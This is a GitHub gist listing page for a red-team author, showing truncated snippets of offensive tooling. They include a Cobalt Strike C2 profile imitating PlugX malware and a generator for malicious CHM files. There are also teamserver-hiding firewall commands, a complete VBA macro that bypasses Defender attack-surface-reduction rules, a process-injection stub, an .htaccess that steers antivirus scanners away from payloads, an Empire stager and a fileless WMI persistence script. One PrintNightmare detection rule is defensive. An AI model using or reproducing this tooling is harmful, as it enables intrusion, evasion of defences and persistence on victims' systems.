Skip to content

Instantly share code, notes, and snippets.

Avatar
🇮🇩
Working from home

Rahmat Nurfauzi infosecn1nja

🇮🇩
Working from home
View GitHub Profile
@infosecn1nja
infosecn1nja / plugx.profile
Last active Apr 19, 2022
Cobalt Strike Malleable C2 Profile - PlugX
View plugx.profile
#
# PlugX Profile
# Author: @infosecn1nja
#
# https://github.com/silence-is-best/c2db/blob/master/README.md
set sleeptime "30000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
stage {
@infosecn1nja
infosecn1nja / printernightmare_cve_2021_34527.xml
Last active Jul 6, 2021
Wazuh Rules: PrinterNightmare CVE-2021-34527 Exploit Detection
View printernightmare_cve_2021_34527.xml
<!--
- PrinterNightmare CVE-2021-34527 Exploit Detection
- Created by Rahmat Nurfauzi (@infosecn1nja).
- This program is a free software; you can redistribute it and/or modify it under the terms of GPLv2.
-->
<group name="sysmon,">
<rule id="99948" level="15">
<if_group>sysmon_event_11</if_group>
<field name="win.eventdata.Image">\\\\spoolsv.exe$</field>
<field name="win.eventdata.TargetFilename">\\\\New\\\\unidrv.dll$</field>
@infosecn1nja
infosecn1nja / gen-chm.py
Last active Jul 11, 2020
This script will generate malicious Compiled HTML Help file (.CHM)
View gen-chm.py
#!/usr/bin/python
import argparse
import re, random
import string, os, os.path
def rand_num(min, max):
return random.randrange(min, max)
def gen_str(size):
return "".join(random.SystemRandom().choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(size))
View gist:97b4b2e5132ae9d3d18448b3f7f7aa93
Make a rule that allows port 80/443 access only from redirector:
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
Change default port teamserver :
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver
@infosecn1nja
infosecn1nja / gist:04ab2d8ea15f98880bbf7b70168fa3dd
Last active May 5, 2022
APT Group/Red Team Weaponization Phase
View gist:04ab2d8ea15f98880bbf7b70168fa3dd
APT Group/Red Team Weaponization Phase
=======================================
C2 tools :
- Cobalt Strike
- Empire
- PoshC2
- PupyRAT
- Metasploit
@infosecn1nja
infosecn1nja / ASR Rules Bypass.vba
Last active Jun 30, 2022
ASR rules bypass creating child processes
View ASR Rules Bypass.vba
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@infosecn1nja
infosecn1nja / Inject.cs
Created Jun 19, 2018
DotNetToJScript Build Walkthrough
View Inject.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
{
public TestClass()
{}
@infosecn1nja
infosecn1nja / .htaccess
Created Jun 9, 2018 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
View .htaccess
RewriteEngine On
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# BURN AV BURN
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device
RewriteCond expr "-R '54.0.0.0/8'" [OR]
RewriteCond expr "-R '52.0.0.0/8'" [OR]
@infosecn1nja
infosecn1nja / wmic_starfighters.py
Created Jun 7, 2018
Empire stagers module to generates a squiblytwo and starfighters launcher.
View wmic_starfighters.py
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'wmic_xsl_starfighters',
'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'],
@infosecn1nja
infosecn1nja / WMI-Persistence.ps1
Created May 14, 2018
Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
View WMI-Persistence.ps1
# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
# https://wikileaks.org/ciav7p1/cms/page_14587908.html
<#
.SYNOPSIS
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once.
#>
$EventFilterName = "Fileless WMI Persistence SystemUptime"